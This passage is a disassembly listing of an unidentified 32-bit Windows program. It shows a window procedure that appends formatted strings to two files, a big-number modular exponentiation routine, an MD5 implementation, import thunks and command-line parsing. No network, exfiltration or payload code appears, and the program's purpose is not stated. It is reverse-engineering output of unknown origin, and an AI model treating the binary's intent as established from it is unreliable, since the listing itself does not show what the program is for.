call sub_407BB8 ; SetFocus
jmp loc_406E38
; ---------------------------------------------------------------------------
loc_406CEC: ; CODE XREF: sub_4068A8+414�j
lea eax, [ebp+var_FF]
push eax
lea eax, [ebp+var_20B]
push eax
push offset aSS_0 ; "%s %s"
lea eax, [ebp+var_20B]
push eax
call sub_407E40
add esp, 10h
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_409020
call sub_407A8C ; CreateFileA
mov [ebp+var_108], eax
push 2
push 0
push 0
push eax
call sub_407ABC ; SetFilePointer
lea ecx, [ebp+var_20B]
or eax, 0FFFFFFFFh
loc_406D42: ; CODE XREF: sub_4068A8+49F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406D42
push 0
lea ebx, [ebp+var_210]
push ebx
push eax
lea esi, [ebp+var_20B]
push esi
push [ebp+var_108]
call sub_407B40 ; WriteFile
push 0
lea eax, [ebp+var_210]
push eax
push 2
push offset asc_424CEC ; "\r\n"
push [ebp+var_108]
call sub_407B40 ; WriteFile
push [ebp+var_108]
call sub_407984 ; CloseHandle
push ds:dword_409124
call sub_407CA8 ; DestroyWindow
push 0
push 0
push 4
push 0
push 0
push 40000000h
push offset dword_408120
call sub_407A8C ; CreateFileA
mov [ebp+var_108], eax
push 2
push 0
push 0
push [ebp+var_108]
call sub_407ABC ; SetFilePointer
lea ecx, byte_419260
or eax, 0FFFFFFFFh
loc_406DCF: ; CODE XREF: sub_4068A8+52C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_406DCF
mov esi, eax
push 0
lea ebx, [ebp+var_210]
push ebx
push esi
push offset byte_419260
push [ebp+var_108]
call sub_407B40 ; WriteFile
push 0
lea eax, [ebp+var_210]
push eax
push 1
push offset byte_4244C8
push [ebp+var_108]
call sub_407B40 ; WriteFile
push [ebp+var_108]
call sub_407984 ; CloseHandle
push 5
push ds:dword_408FEC
call sub_407C90 ; ShowWindow
jmp short loc_406E38
; ---------------------------------------------------------------------------
loc_406E27: ; CODE XREF: sub_4068A8+23�j
; sub_4068A8+3F�j ...
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407CC0 ; DefWindowProcA
loc_406E38: ; CODE XREF: sub_4068A8+128�j
; sub_4068A8+146�j ...
pop edi
pop esi
pop ebx
leave
retn 10h
sub_4068A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E40 proc near ; CODE XREF: sub_4043B0+15�p
; sub_4043B0+25�p
jmp ds:dword_426334
sub_406E40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E4C proc near ; CODE XREF: sub_4034AD+7B�p
jmp ds:dword_426340
sub_406E4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E58 proc near ; CODE XREF: sub_4034AD+C9�p
jmp ds:dword_426344
sub_406E58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E64 proc near ; CODE XREF: sub_404184+43�p
jmp ds:dword_426350
sub_406E64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E70 proc near ; CODE XREF: sub_404184+23�p
jmp ds:dword_426354
sub_406E70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E7C proc near ; CODE XREF: sub_404184+15�p
jmp ds:dword_426358
sub_406E7C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_406E88 proc near ; CODE XREF: sub_40414B+30�p
jmp ds:dword_42635C
sub_406E88 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E94 proc near ; CODE XREF: sub_405336+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_425448
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_406F5F
xor edx, edx
loc_406EC4: ; CODE XREF: sub_406E94+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_406ED6
mov edx, [ebp+arg_4]
call sub_406EF0
loc_406ED6: ; CODE XREF: sub_406E94+38�j
lea edx, dword_425448
call sub_406EF0
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_406EC4
popa
pop ebp
retn 10h
sub_406E94 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406EF0 proc near ; CODE XREF: sub_406E94+3D�p
; sub_406E94+48�p
lea edi, dword_425408
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_425448
call sub_406F5F
loc_406F0A: ; CODE XREF: sub_406EF0+5D�j
lea edi, dword_425408
mov ecx, 10h
xor eax, eax
loc_406F17: ; CODE XREF: sub_406EF0+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_406F17
call sub_406F70
bt dword_425448, ebx
jnb short loc_406F4C
mov esi, edx
lea edi, dword_425408
xor eax, eax
mov ecx, 10h
loc_406F3B: ; CODE XREF: sub_406EF0+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_406F3B
call sub_406F70
loc_406F4C: ; CODE XREF: sub_406EF0+3A�j
dec ebx
jns short loc_406F0A
mov edi, edx
lea esi, dword_425408
mov ecx, 10h
rep movsd
retn
sub_406EF0 endp
; =============== S U B R O U T I N E =======================================
sub_406F5F proc near ; CODE XREF: sub_406E94+29�p
; sub_406EF0+15�p
mov ebx, 1FFh
loc_406F64: ; CODE XREF: sub_406F5F+B�j
bt [edi], ebx
jb short locret_406F6C
dec ebx
jnz short loc_406F64
locret_406F6C: ; CODE XREF: sub_406F5F+8�j
retn
sub_406F5F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406F70 proc near ; CODE XREF: sub_406EF0+2E�p
; sub_406EF0+57�p
lea esi, dword_425408
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_406F7E: ; CODE XREF: sub_406F70+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_406FA7
ja short loc_406F8B
dec ecx
jns short loc_406F7E
loc_406F8B: ; CODE XREF: sub_406F70+16�j
mov esi, [ebp+14h]
lea edi, dword_425408
xor eax, eax
mov ecx, 10h
loc_406F9B: ; CODE XREF: sub_406F70+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_406F9B
locret_406FA7: ; CODE XREF: sub_406F70+14�j
retn
sub_406F70 endp
; =============== S U B R O U T I N E =======================================
sub_406FA8 proc near ; CODE XREF: sub_406FF9+32�p
; sub_406FF9+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_406FA8 endp
; =============== S U B R O U T I N E =======================================
sub_406FB5 proc near ; CODE XREF: sub_406FF9+219�p
; sub_406FF9+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_406FB5 endp
; =============== S U B R O U T I N E =======================================
sub_406FC2 proc near ; CODE XREF: sub_406FF9+420�p
; sub_406FF9+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_406FC2 endp
; =============== S U B R O U T I N E =======================================
sub_406FC9 proc near ; CODE XREF: sub_406FF9+627�p
; sub_406FF9+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_406FC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406FD2 proc near ; CODE XREF: sub_405350+58�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_406FD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406FF9 proc near ; CODE XREF: sub_405350+69�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_425488, eax
mov eax, [edi+4]
mov dword_42548C, eax
mov eax, [edi+8]
mov dword_425490, eax
mov eax, [edi+0Ch]
mov dword_425494, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FA8
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FA8
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FA8
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FA8
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FA8
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FA8
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FA8
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FA8
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FA8
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FA8
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FA8
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FA8
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FA8
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FA8
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FA8
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FB5
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FB5
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FB5
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FB5
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FB5
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FB5
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FB5
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FB5
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FB5
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FB5
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FB5
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FB5
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FB5
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FB5
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FB5
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FB5
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC2
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC2
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC2
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC2
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC2
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC2
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC2
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC2
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC2
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC2
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC2
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC2
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC2
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC2
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC2
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC2
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC9
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC9
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC9
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC9
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC9
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC9
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC9
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC9
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC9
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC9
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC9
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC9
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_406FC9
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_406FC9
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_406FC9
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_406FC9
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_425488
add [edi], eax
mov eax, dword_42548C
add [edi+4], eax
mov eax, dword_425490
add [edi+8], eax
mov eax, dword_425494
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_406FF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407844 proc near ; CODE XREF: sub_405AAC+79A�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_407844 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407868 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_407930 ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40789C
push 22h
mov eax, edi
inc eax
push eax
call sub_407E70
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_4078B7
mov edi, eax
inc edi
jmp short loc_407894
; ---------------------------------------------------------------------------
loc_407893: ; CODE XREF: sub_407868+2F�j
inc edi
loc_407894: ; CODE XREF: sub_407868+29�j
cmp byte ptr [edi], 20h
jz short loc_407893
jmp short loc_4078B7
; ---------------------------------------------------------------------------
loc_40789B: ; CODE XREF: sub_407868+3E�j
inc edi
loc_40789C: ; CODE XREF: sub_407868+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_4078A8
cmp eax, 20h
jnz short loc_40789B
loc_4078A8: ; CODE XREF: sub_407868+39�j
jmp short loc_4078AB
; ---------------------------------------------------------------------------
loc_4078AA: ; CODE XREF: sub_407868+4D�j
inc edi
loc_4078AB: ; CODE XREF: sub_407868:loc_4078A8�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_4078B7
cmp eax, 20h
jz short loc_4078AA
loc_4078B7: ; CODE XREF: sub_407868+24�j
; sub_407868+31�j ...
push 0
call sub_407978 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_406344
pop edi
leave
retn
sub_407868 endp
; =============== S U B R O U T I N E =======================================
sub_4078CC proc near ; CODE XREF: sub_40129C+8�p
; sub_401EAF+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_4078CD: ; CODE XREF: sub_4078CC+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_4078CD
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_4078CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4078EC proc near ; CODE XREF: sub_401565+75�p
; sub_4034AD+1D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_4078EC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407918 proc near ; CODE XREF: sub_406344+1F1�p
jmp ds:dword_426368
sub_407918 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407924 proc near ; CODE XREF: sub_403D8E+9C�p
jmp ds:dword_42636C
sub_407924 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407930 proc near ; CODE XREF: sub_407868+5�p
jmp ds:dword_426370
sub_407930 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40793C proc near ; CODE XREF: sub_401B3E:loc_401D6E�p
; sub_4033E8+6�p ...
jmp ds:dword_426374
sub_40793C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407948 proc near ; CODE XREF: sub_402CB2+F�p
jmp ds:dword_426378
sub_407948 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407954 proc near ; CODE XREF: sub_4014E2+3C�p
; sub_405AAC+3D3�p
jmp ds:dword_42637C
sub_407954 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407960 proc near ; CODE XREF: sub_40519A+7A�p
jmp ds:dword_426380
sub_407960 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40796C proc near ; CODE XREF: sub_402784+89�p
; sub_402B0D+1E�p ...
jmp ds:dword_426384
sub_40796C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407978 proc near ; CODE XREF: sub_4019A1+6�p
; sub_401B3E+C3�p ...
jmp ds:dword_426388
sub_407978 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407984 proc near ; CODE XREF: sub_40129C+4F�p
; sub_4014E2+72�p ...
jmp ds:dword_42638C
sub_407984 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_407990 proc near ; CODE XREF: sub_4019A1+13�p
; sub_4019A1+23�p ...
jmp ds:dword_426390
sub_407990 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40799C proc near ; CODE XREF: sub_4026EE+1D�p
; sub_402B0D+4E�p ...
jmp ds:dword_426394
sub_40799C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4079A8 proc near ; CODE XREF: sub_403659+A7�p
jmp ds:dword_426398
sub_4079A8 endp
